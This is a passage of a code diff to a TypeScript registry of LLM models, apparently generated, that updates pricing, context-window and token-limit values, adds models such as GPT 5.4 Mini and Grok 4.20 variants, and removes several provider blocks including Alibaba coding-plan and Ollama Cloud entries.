"moonshotai/kimi-k2-thinking-turbo", @@ -11919,9 +12088,9 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 2.4, - output: 10, - cacheRead: 0, + input: 1.15, + output: 8, + cacheRead: 0.15, cacheWrite: 0, }, contextWindow: 256000, @@ -11936,13 +12105,13 @@ export const MODELS = { reasoning: true, input: ["text", "image"], cost: { - input: 0.5, - output: 2.8, - cacheRead: 0, + input: 0.6, + output: 3, + cacheRead: 0.09999999999999999, cacheWrite: 0, }, - contextWindow: 256000, - maxTokens: 256000, + contextWindow: 262114, + maxTokens: 262114, } satisfies Model<"anthropic-messages">, "nvidia/nemotron-nano-12b-v2-vl": { id: "nvidia/nemotron-nano-12b-v2-vl", @@ -11970,31 +12139,14 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.04, - output: 0.16, + input: 
0.06, + output: 0.22999999999999998, cacheRead: 0, cacheWrite: 0, }, contextWindow: 131072, maxTokens: 131072, } satisfies Model<"anthropic-messages">, - "openai/codex-mini": { - id: "openai/codex-mini", - name: "Codex Mini", - api: "anthropic-messages", - provider: "vercel-ai-gateway", - baseUrl: "https://ai-gateway.vercel.sh", - reasoning: true, - input: ["text", "image"], - cost: { - input: 1.5, - output: 6, - cacheRead: 0.375, - cacheWrite: 0, - }, - contextWindow: 200000, - maxTokens: 100000, - } satisfies Model<"anthropic-messages">, "openai/gpt-4-turbo": { id: "openai/gpt-4-turbo", name: "GPT-4 Turbo", @@ -12057,7 +12209,7 @@ export const MODELS = { cost: { input: 0.09999999999999999, output: 0.39999999999999997, - cacheRead: 0.03, + cacheRead: 0.024999999999999998, cacheWrite: 0, }, contextWindow: 1047576, @@ -12108,7 +12260,7 @@ export const MODELS = { cost: { input: 1.25, output: 10, - cacheRead: 0.13, + cacheRead: 0.125, cacheWrite: 0, }, contextWindow: 400000, @@ -12138,11 +12290,11 @@ export const MODELS = { provider: "vercel-ai-gateway", baseUrl: "https://ai-gateway.vercel.sh", reasoning: true, - input: ["text", "image"], + input: ["text"], cost: { input: 1.25, output: 10, - cacheRead: 0.13, + cacheRead: 0.125, cacheWrite: 0, }, contextWindow: 400000, @@ -12159,7 +12311,7 @@ export const MODELS = { cost: { input: 0.25, output: 2, - cacheRead: 0.03, + cacheRead: 0.024999999999999998, cacheWrite: 0, }, contextWindow: 400000, @@ -12176,7 +12328,7 @@ export const MODELS = { cost: { input: 0.049999999999999996, output: 0.39999999999999997, - cacheRead: 0.01, + cacheRead: 0.005, cacheWrite: 0, }, contextWindow: 400000, @@ -12210,7 +12362,7 @@ export const MODELS = { cost: { input: 1.25, output: 10, - cacheRead: 0.13, + cacheRead: 0.125, cacheWrite: 0, }, contextWindow: 400000, @@ -12261,7 +12413,7 @@ export const MODELS = { cost: { input: 1.25, output: 10, - cacheRead: 0.13, + cacheRead: 0.125, cacheWrite: 0, }, contextWindow: 128000, @@ -12278,7 +12430,7 
@@ export const MODELS = { cost: { input: 1.25, output: 10, - cacheRead: 0.13, + cacheRead: 0.125, cacheWrite: 0, }, contextWindow: 400000, @@ -12295,7 +12447,7 @@ export const MODELS = { cost: { input: 1.75, output: 14, - cacheRead: 0.18, + cacheRead: 0.175, cacheWrite: 0, }, contextWindow: 400000, @@ -12400,7 +12552,41 @@ export const MODELS = { cacheRead: 0.25, cacheWrite: 0, }, - contextWindow: 200000, + contextWindow: 1050000, + maxTokens: 128000, + } satisfies Model<"anthropic-messages">, + "openai/gpt-5.4-mini": { + id: "openai/gpt-5.4-mini", + name: "GPT 5.4 Mini", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.75, + output: 4.5, + cacheRead: 0.075, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"anthropic-messages">, + "openai/gpt-5.4-nano": { + id: "openai/gpt-5.4-nano", + name: "GPT 5.4 Nano", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.19999999999999998, + output: 1.25, + cacheRead: 0.02, + cacheWrite: 0, + }, + contextWindow: 400000, maxTokens: 128000, } satisfies Model<"anthropic-messages">, "openai/gpt-5.4-pro": { @@ -12420,23 +12606,6 @@ export const MODELS = { contextWindow: 1050000, maxTokens: 128000, } satisfies Model<"anthropic-messages">, - "openai/gpt-oss-120b": { - id: "openai/gpt-oss-120b", - name: "gpt-oss-120b", - api: "anthropic-messages", - provider: "vercel-ai-gateway", - baseUrl: "https://ai-gateway.vercel.sh", - reasoning: true, - input: ["text"], - cost: { - input: 0.09999999999999999, - output: 0.5, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131072, - maxTokens: 131072, - } satisfies Model<"anthropic-messages">, "openai/gpt-oss-20b": { id: "openai/gpt-oss-20b", name: "gpt-oss-20b", @@ -12624,40 +12793,6 @@ export const MODELS = { 
contextWindow: 131072, maxTokens: 131072, } satisfies Model<"anthropic-messages">, - "vercel/v0-1.0-md": { - id: "vercel/v0-1.0-md", - name: "v0-1.0-md", - api: "anthropic-messages", - provider: "vercel-ai-gateway", - baseUrl: "https://ai-gateway.vercel.sh", - reasoning: false, - input: ["text", "image"], - cost: { - input: 3, - output: 15, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 128000, - maxTokens: 32000, - } satisfies Model<"anthropic-messages">, - "vercel/v0-1.5-md": { - id: "vercel/v0-1.5-md", - name: "v0-1.5-md", - api: "anthropic-messages", - provider: "vercel-ai-gateway", - baseUrl: "https://ai-gateway.vercel.sh", - reasoning: false, - input: ["text", "image"], - cost: { - input: 3, - output: 15, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 128000, - maxTokens: 32768, - } satisfies Model<"anthropic-messages">, "xai/grok-2-vision": { id: "xai/grok-2-vision", name: "Grok 2 Vision", @@ -12686,7 +12821,7 @@ export const MODELS = { cost: { input: 3, output: 15, - cacheRead: 0, + cacheRead: 0.75, cacheWrite: 0, }, contextWindow: 131072, @@ -12703,7 +12838,7 @@ export const MODELS = { cost: { input: 5, output: 25, - cacheRead: 0, + cacheRead: 1.25, cacheWrite: 0, }, contextWindow: 131072, @@ -12720,7 +12855,7 @@ export const MODELS = { cost: { input: 0.3, output: 0.5, - cacheRead: 0, + cacheRead: 0.075, cacheWrite: 0, }, contextWindow: 131072, @@ -12754,7 +12889,7 @@ export const MODELS = { cost: { input: 3, output: 15, - cacheRead: 0, + cacheRead: 0.75, cacheWrite: 0, }, contextWindow: 256000, @@ -12828,6 +12963,57 @@ export const MODELS = { contextWindow: 2000000, maxTokens: 30000, } satisfies Model<"anthropic-messages">, + "xai/grok-4.20-multi-agent-beta": { + id: "xai/grok-4.20-multi-agent-beta", + name: "Grok 4.20 Multi Agent Beta", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text"], + cost: { + input: 2, + output: 6, + cacheRead: 
0.19999999999999998, + cacheWrite: 0, + }, + contextWindow: 2000000, + maxTokens: 2000000, + } satisfies Model<"anthropic-messages">, + "xai/grok-4.20-non-reasoning-beta": { + id: "xai/grok-4.20-non-reasoning-beta", + name: "Grok 4.20 Beta Non-Reasoning", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: false, + input: ["text", "image"], + cost: { + input: 2, + output: 6, + cacheRead: 0.19999999999999998, + cacheWrite: 0, + }, + contextWindow: 2000000, + maxTokens: 2000000, + } satisfies Model<"anthropic-messages">, + "xai/grok-4.20-reasoning-beta": { + id: "xai/grok-4.20-reasoning-beta", + name: "Grok 4.20 Beta Reasoning", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text", "image"], + cost: { + input: 2, + output: 6, + cacheRead: 0.19999999999999998, + cacheWrite: 0, + }, + contextWindow: 2000000, + maxTokens: 2000000, + } satisfies Model<"anthropic-messages">, "xai/grok-code-fast-1": { id: "xai/grok-code-fast-1", name: "Grok Code Fast 1", @@ -12854,14 +13040,31 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.09, - output: 0.29, - cacheRead: 0, + input: 0.09999999999999999, + output: 0.3, + cacheRead: 0.02, cacheWrite: 0, }, contextWindow: 262144, maxTokens: 32000, } satisfies Model<"anthropic-messages">, + "xiaomi/mimo-v2-pro": { + id: "xiaomi/mimo-v2-pro", + name: "MiMo V2 Pro", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text"], + cost: { + input: 1, + output: 3, + cacheRead: 0.19999999999999998, + cacheWrite: 0, + }, + contextWindow: 1000000, + maxTokens: 128000, + } satisfies Model<"anthropic-messages">, "zai/glm-4.5": { id: "zai/glm-4.5", name: "GLM-4.5", @@ -12873,11 +13076,11 @@ export const MODELS = { cost: { input: 0.6, output: 2.2, - cacheRead: 0, + cacheRead: 0.11, 
cacheWrite: 0, }, - contextWindow: 131072, - maxTokens: 131072, + contextWindow: 128000, + maxTokens: 96000, } satisfies Model<"anthropic-messages">, "zai/glm-4.5-air": { id: "zai/glm-4.5-air", @@ -12902,16 +13105,16 @@ export const MODELS = { api: "anthropic-messages", provider: "vercel-ai-gateway", baseUrl: "https://ai-gateway.vercel.sh", - reasoning: true, + reasoning: false, input: ["text", "image"], cost: { input: 0.6, output: 1.7999999999999998, - cacheRead: 0, + cacheRead: 0.11, cacheWrite: 0, }, - contextWindow: 65536, - maxTokens: 16384, + contextWindow: 66000, + maxTokens: 16000, } satisfies Model<"anthropic-messages">, "zai/glm-4.6": { id: "zai/glm-4.6", @@ -12922,8 +13125,8 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.44999999999999996, - output: 1.7999999999999998, + input: 0.6, + output: 2.2, cacheRead: 0.11, cacheWrite: 0, }, @@ -12973,14 +13176,31 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.43, - output: 1.75, - cacheRead: 0.08, + input: 0.6, + output: 2.2, + cacheRead: 0, cacheWrite: 0, }, - contextWindow: 202752, + contextWindow: 200000, maxTokens: 120000, } satisfies Model<"anthropic-messages">, + "zai/glm-4.7-flash": { + id: "zai/glm-4.7-flash", + name: "GLM 4.7 Flash", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text"], + cost: { + input: 0.07, + output: 0.39999999999999997, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 200000, + maxTokens: 131000, + } satisfies Model<"anthropic-messages">, "zai/glm-4.7-flashx": { id: "zai/glm-4.7-flashx", name: "GLM 4.7 FlashX", @@ -13000,7 +13220,7 @@ export const MODELS = { } satisfies Model<"anthropic-messages">, "zai/glm-5": { id: "zai/glm-5", - name: "GLM-5", + name: "GLM 5", api: "anthropic-messages", provider: "vercel-ai-gateway", baseUrl: "https://ai-gateway.vercel.sh", @@ -13013,7 +13233,24 @@ export const MODELS = { cacheWrite: 0, 
}, contextWindow: 202800, - maxTokens: 131072, + maxTokens: 131100, + } satisfies Model<"anthropic-messages">, + "zai/glm-5-turbo": { + id: "zai/glm-5-turbo", + name: "GLM 5 Turbo", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text"], + cost: { + input: 1.2, + output: 4, + cacheRead: 0.24, + cacheWrite: 0, + }, + contextWindow: 202800, + maxTokens: 131100, } satisfies Model<"anthropic-messages">, }, "xai": { @@ -13340,6 +13577,40 @@ export const MODELS = { contextWindow: 2000000, maxTokens: 30000, } satisfies Model<"openai-completions">, + "grok-4.20-0309-non-reasoning": { + id: "grok-4.20-0309-non-reasoning", + name: "Grok 4.20 (Non-Reasoning)", + api: "openai-completions", + provider: "xai", + baseUrl: "https://api.x.ai/v1", + reasoning: false, + input: ["text", "image"], + cost: { + input: 2, + output: 6, + cacheRead: 0.2, + cacheWrite: 0, + }, + contextWindow: 2000000, + maxTokens: 30000, + } satisfies Model<"openai-completions">, + "grok-4.20-0309-reasoning": { + id: "grok-4.20-0309-reasoning", + name: "Grok 4.20 (Reasoning)", + api: "openai-completions", + provider: "xai", + baseUrl: "https://api.x.ai/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 2, + output: 6, + cacheRead: 0.2, + cacheWrite: 0, + }, + contextWindow: 2000000, + maxTokens: 30000, + } satisfies Model<"openai-completions">, "grok-beta": { id: "grok-beta", name: "Grok Beta", @@ -13555,747 +13826,23 @@ export const MODELS = { contextWindow: 204800, maxTokens: 131072, } satisfies Model<"openai-completions">, - }, - "alibaba-coding-plan": { - "qwen3.5-plus": { - id: "qwen3.5-plus", - name: "Qwen3.5 Plus", + "glm-5-turbo": { + id: "glm-5-turbo", + name: "GLM-5-Turbo", api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + provider: "zai", + baseUrl: "https://api.z.ai/api/coding/paas/v4", + compat: 
{"supportsDeveloperRole":false,"thinkingFormat":"zai"}, reasoning: true, input: ["text"], cost: { - input: 0, - output: 0, - cacheRead: 0, + input: 1.2, + output: 4, + cacheRead: 0.24, cacheWrite: 0, }, - contextWindow: 983616, - maxTokens: 65536, - compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, - } satisfies Model<"openai-completions">, - "qwen3-max-2026-01-23": { - id: "qwen3-max-2026-01-23", - name: "Qwen3 Max 2026-01-23", - api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 258048, - maxTokens: 32768, - compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, - } satisfies Model<"openai-completions">, - "qwen3-coder-next": { - id: "qwen3-coder-next", - name: "Qwen3 Coder Next", - api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 204800, - maxTokens: 65536, - compat: { supportsDeveloperRole: false }, - } satisfies Model<"openai-completions">, - "qwen3-coder-plus": { - id: "qwen3-coder-plus", - name: "Qwen3 Coder Plus", - api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 997952, - maxTokens: 65536, - compat: { supportsDeveloperRole: false }, - } satisfies Model<"openai-completions">, - "MiniMax-M2.5": { - id: "MiniMax-M2.5", - name: "MiniMax M2.5", - api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - 
cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 196608, - maxTokens: 65536, - compat: { supportsStore: false, supportsDeveloperRole: false, supportsReasoningEffort: true, maxTokensField: "max_tokens" }, - } satisfies Model<"openai-completions">, - "glm-5": { - id: "glm-5", - name: "GLM-5", - api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 202752, - maxTokens: 16384, - compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, - } satisfies Model<"openai-completions">, - "glm-4.7": { - id: "glm-4.7", - name: "GLM-4.7", - api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 169984, - maxTokens: 16384, - compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, - } satisfies Model<"openai-completions">, - "kimi-k2.5": { - id: "kimi-k2.5", - name: "Kimi K2.5", - api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 258048, - maxTokens: 32768, - compat: { thinkingFormat: "zai", supportsDeveloperRole: false }, - } satisfies Model<"openai-completions">, - }, - "ollama-cloud": { - "cogito-2.1:671b": { - id: "cogito-2.1:671b", - name: "Cogito 2.1 671B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - 
cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 163840, - maxTokens: 32000, - } satisfies Model<"openai-completions">, - "deepseek-v3.1:671b": { - id: "deepseek-v3.1:671b", - name: "DeepSeek V3.1 671B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 163840, - maxTokens: 163840, - } satisfies Model<"openai-completions">, - "deepseek-v3.2": { - id: "deepseek-v3.2", - name: "DeepSeek V3.2", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 163840, - maxTokens: 65536, - } satisfies Model<"openai-completions">, - "devstral-2:123b": { - id: "devstral-2:123b", - name: "Devstral 2 123B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 262144, - } satisfies Model<"openai-completions">, - "devstral-small-2:24b": { - id: "devstral-small-2:24b", - name: "Devstral Small 2 24B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: 
{"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 262144, - } satisfies Model<"openai-completions">, - "gemini-3-flash-preview": { - id: "gemini-3-flash-preview", - name: "Gemini 3 Flash Preview", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 1048576, - maxTokens: 65536, - } satisfies Model<"openai-completions">, - "gemma3:12b": { - id: "gemma3:12b", - name: "Gemma 3 12B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131072, + contextWindow: 200000, maxTokens: 131072, } satisfies Model<"openai-completions">, - "gemma3:27b": { - id: "gemma3:27b", - name: "Gemma 3 27B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131072, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "gemma3:4b": { - id: "gemma3:4b", - name: 
"Gemma 3 4B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131072, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "glm-4.6": { - id: "glm-4.6", - name: "GLM 4.6", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 202752, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "glm-4.7": { - id: "glm-4.7", - name: "GLM 4.7", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 202752, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "glm-5": { - id: "glm-5", - name: "GLM 5", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 202752, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "gpt-oss:120b": { - id: "gpt-oss:120b", - 
name: "GPT-OSS 120B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131072, - maxTokens: 32768, - } satisfies Model<"openai-completions">, - "gpt-oss:20b": { - id: "gpt-oss:20b", - name: "GPT-OSS 20B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131072, - maxTokens: 32768, - } satisfies Model<"openai-completions">, - "kimi-k2:1t": { - id: "kimi-k2:1t", - name: "Kimi K2 1T", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 262144, - } satisfies Model<"openai-completions">, - "kimi-k2.5": { - id: "kimi-k2.5", - name: "Kimi K2.5", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 262144, - } satisfies Model<"openai-completions">, - 
"kimi-k2-thinking": { - id: "kimi-k2-thinking", - name: "Kimi K2 Thinking", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 262144, - } satisfies Model<"openai-completions">, - "minimax-m2.1": { - id: "minimax-m2.1", - name: "Minimax M2.1", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 204800, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "minimax-m2.5": { - id: "minimax-m2.5", - name: "Minimax M2.5", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 204800, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "minimax-m2": { - id: "minimax-m2", - name: "Minimax M2", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 204800, - 
maxTokens: 128000, - } satisfies Model<"openai-completions">, - "ministral-3:14b": { - id: "ministral-3:14b", - name: "Ministral 3 14B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 128000, - } satisfies Model<"openai-completions">, - "ministral-3:3b": { - id: "ministral-3:3b", - name: "Ministral 3 3B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 128000, - } satisfies Model<"openai-completions">, - "ministral-3:8b": { - id: "ministral-3:8b", - name: "Ministral 3 8B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 128000, - } satisfies Model<"openai-completions">, - "mistral-large-3:675b": { - id: "mistral-large-3:675b", - name: "Mistral Large 3 675B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - 
reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 262144, - } satisfies Model<"openai-completions">, - "nemotron-3-nano:30b": { - id: "nemotron-3-nano:30b", - name: "Nemotron 3 Nano 30B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 1048576, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "nemotron-3-super": { - id: "nemotron-3-super", - name: "Nemotron 3 Super", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 65536, - } satisfies Model<"openai-completions">, - "qwen3.5:397b": { - id: "qwen3.5:397b", - name: "Qwen 3.5 397B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: 